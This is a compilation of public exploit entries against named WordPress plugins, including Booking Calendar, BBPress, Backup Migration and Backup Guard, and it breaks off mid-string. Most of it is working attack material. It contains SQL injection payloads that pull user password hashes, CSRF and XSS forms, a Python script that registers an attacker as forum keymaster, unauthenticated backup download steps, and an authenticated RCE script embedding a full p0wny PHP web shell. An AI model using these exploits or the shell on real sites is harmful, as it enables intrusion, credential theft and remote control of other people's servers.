The Booking Calendar WordPress Plugin is a booking system for online reservation and availability checking service for your site. An SQL injection vulnerability exists in the Booking Calendar WordPress plugin. This vulnerability allows an attacker to view data from the database. The affected parameter is not properly sanitized or protected with an anti-Cross-Site Request Forgery token. Consequently, it can (also be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).
Details
This was discovered by the using the filter by Booking ID field. Because a WordPress user with the 'Editor' role can also use the Booking plugin, Editors can also access the vulnerable parameter. This allows these users to view all data from the database. The vulnerability exists in the wpdev_get_args_from_request_in_bk_listing() function from booking/lib/wpdev-bk-lib.php (line 709).
Proof of concept
The following proof of concept will show the hashed password from the first user.
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing" method="POST">
<input type="hidden" name="wh_booking_id" value="3 AND (SELECT 5283 FROM(SELECT COUNT(*),CONCAT(0x7176626271,(SELECT MID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 26.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: Wachipi
# Vendor Homepage: https://codecanyon.net/item/wp-booking-calendar/4639530
# Version: 3.0.0
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can perform attacks via calendar ajax queries.
However, this plugin is fully PHP-enabled. You can run SQL query with "month" and "year" parameters.
These parameters are also suitable for XSS attacks.
All PHP queries for which these parameters work have the same vulnerable.
====================================================
# "fillEventsPopup.php, searchEvents.php, getEvent.php, getMonthCalendar.php" have the same vulnerable.
# PoC : SQLi :
# GET /BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php?month=4&year=2018&calendar_id=1&publickey=6LcDyOASAAAAACsEVY6G4Yo1BqxCGW15S15mb36-%20&wpml_lang=
# Parameter: month (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&calendar_id=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&calendar_id=1
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1
Parameter: year (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: year=-8454' OR 7997=7997#&month=5&calendar_id=14&pag=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: year=2018' AND SLEEP(5)-- uTJs&month=5&calendar_id=14&pag=1
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&calendar_id=1
====================================================
# PoC : XSS :
Payload(year) : http://www.site.com/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php?month=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&year=2018&calendar_id=1&publickey=6LcDyOASAAAAACsEVY6G4Yo1BqxCGW15S15mb36-%20&wpml_lang=
Payload(month) : http://www.site.com/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php?month=4&year=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&calendar_id=1&publickey=6LcDyOASAAAAACsEVY6G4Yo1BqxCGW15S15mb36-%20&wpml_lang=
source: https://www.securityfocus.com/bid/63800/info
The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected.
<form id=.upload-form.
action=.http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos.
method=.post.>
<table class=.form-table.>
<tbody>
<tr valign=.top.>
<th scope=.row.>Title</th>
<td><input id=.bw_title. type=.text. maxlength=.75. name=.bw_title.
size=.70. value=.http://www.example2.com/code/evil.js. />
</tr>
<tr valign=.top .>
<th scope=.row.>URL</th>
<td><input id=.bw_url. type=.text. maxlength=.75. name=.bw_url.
size=.70. value=.http://www.example2.com/code/evil.js. />
</td>
</tr>
</tbody>
</table>
</form>
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
<input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
<input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
<input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
<input type="hidden" name="ba_lp_attr[logo_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
<input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
<input type="hidden" name="ba_lp_attr[bg_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
<input type="hidden" name="ba_lp_options_save" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
* Exploit Title: BWS Captcha Multiple Vulnerabilities
* Discovery Date:12.03.2015
* Public Disclosure Date:03.10.2016
* Exploit Author: Colette Chamberland
* Contact: colette@wordfence.com
* Vendor Homepage: http://bestwebsoft.com/
* Software Link: https://wordpress.org/plugins/captcha/
* Version: <=4.1.5
* Tested on: Wordpress 4.2.x
* Category: Wordpress
* CVE: Requested but none received
Description
================================================================================
Unsanitized input in whitelist.php:
297: $message = __( 'Search results for', $this->textdomain ) . ' : ' . $_REQUEST['s'];
PoC
================================================================================
The variable can be passed in using a get as well as a post. An attacker
could send unsuspecting authenticated admin a url crafted like such:
http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
or they can send a form (no CSRF token check)
<form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist">
<input type="hidden" name="s" value="<script>alert(1);</script>">
<input type="submit" name="Search IP" value="Click here to claim your prize!">
</form>
and it would execute XSS as long as they were logged in to the site.
# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress – Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/
# Software Link: https://wordpress.org/plugins/bbs-e-franchise/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.1.1
# Tested on: Windows 8.1
1 - Description:
$_GET[‘uid’] is not escaped. Url is accessible for any user.
I will have find post or page that usage plugin, that use shortcode
http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/
2 - Proof of Concept:
http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
# Date: 2020-05-29
# Exploit Author: Raphael Karger
# Software Link: https://codex.bbpress.org/releases/
# Version: BBPress < 2.5
# CVE: CVE-2020-13693
import argparse
import requests
import bs4
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
useragent = {"User-Agent" : "This is a real browser i swear"}
def grab_nonce_login_page(url):
try:
login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)
soup = bs4.BeautifulSoup(login_page_request.text, "lxml")
action = soup.find("form", class_="bbp-login-form")
wp_login_page = action.get("action")
wp_nonce = action.find("input", id="_wpnonce").get("value")
return (wp_nonce, wp_login_page)
except Exception as nonce_error:
print("[-] Nonce Error: '{}'".format(nonce_error))
return False
def exploit(url, username, password, email):
info = grab_nonce_login_page(url)
if info:
nonce = info[0]
login_page = info[1]
try:
return requests.post(login_page, data={
"user_login" : username,
"user_pass" : password,
"user_email" : email,
"user-submit" : "",
"user-cookie" : "1",
"_wpnonce" : nonce,
"bbp-forums-role" : "bbp_keymaster"
}, allow_redirects=False, verify=False, timeout=10, headers=useragent)
except Exception as e:
print("[-] Error Making Signup Post Request: '{}'".format(e))
return False
if __name__ == "__main__":
exit("asdasd")
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks")
parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123")
parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com")
parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True)
args = parser.parse_args()
site_exploit = exploit(args.url, args.username, args.password, args.email)
if site_exploit and site_exploit.status_code == 302:
exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password))
print("[-] Exploit Failed")
source: https://www.securityfocus.com/bid/58671/info
The Banners Lite plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script>
# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/baggage-freight/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 0.1.0
# Category: webapps
# Unrestricted file upload for unahtorized user in package info upload
# process allowing arbitrary extension.
File: upload-package.php
Vulnerable code:
if($_POST["submit"])
{
if ($_FILES["file"])
{
$uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
# Exploitation example:
POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"
1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav
<?php phpinfo();
-----------------------------18311719029180117571501079851--
# Uploaded file will be located at /wp-content/plugins/baggage_shipping/upload/{timestamp}_info.php.
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2
1) Get the version of the plugin.
=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------
2) Get the name of the backup directory.
=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------
3) Get the name of the archive containing the backups.
=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------
4) Build the path for the download.
=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
# Exploit Title: Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)
# Date 02.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://backup-guard.com/products/backup-wordpress
# Software Link: https://downloads.wordpress.org/plugin/backup.1.5.8.zip
# Version: Before 1.6.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24155
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24155/README.md
'''
Description:
The plugin did not ensure that the imported files are of the SGBP format and extension,
allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.
Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue:
There is a protection in place against accessing the uploaded files,
via a .htaccess in the wp-content/uploads/backup-guard/ folder, however:
- Some web servers do not support .htaccess, e.g Nginx, making it useless in such case
- Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid,
and bypass the protection on web servers such as Apache
Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present,
but the file content is not verified, which could still allow chaining with an issue
such as LFI or Arbitrary File Renaming to achieve RCE
'''
'''
Banner:
'''
banner = """
______ _______ ____ ___ ____ _ ____ _ _ _ ____ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | ___| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| |___ \___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |___) |__) |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|____/____/
* Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()
'''
Retrieve Token for backup:
'''
token_url = "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=backup_guard_backups'
# Header (Token):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/users.php',
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
# Get Token:
print('')
print('[+] Grabbing unique Backup Plugin Wordpress Token:')
token_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups'
init_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/index.php'
init_request = session.get(init_url).text
token_request = session.get(token_url).text
token_start_in = token_request.find('&token=')
token_start_in = token_request[token_start_in + 7:]
token = token_start_in[:token_start_in.find('"')]
print(' -> Token: ' + token)
'''
Exploit:
'''
print('')
print('[*] Starting Exploit:')
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=' + token
# Header (Exploit):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups',
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------17366980624047956771255332862",
"Origin": 'http://' + target_ip,
"Connection": "close"
}
# Body (Exploit): Using p0wny shell: https://github.com/flozz/p0wny-shell
body = "-----------------------------17366980624047956771255332862\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"shell.php\"\r\nContent-Type: image/png\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ 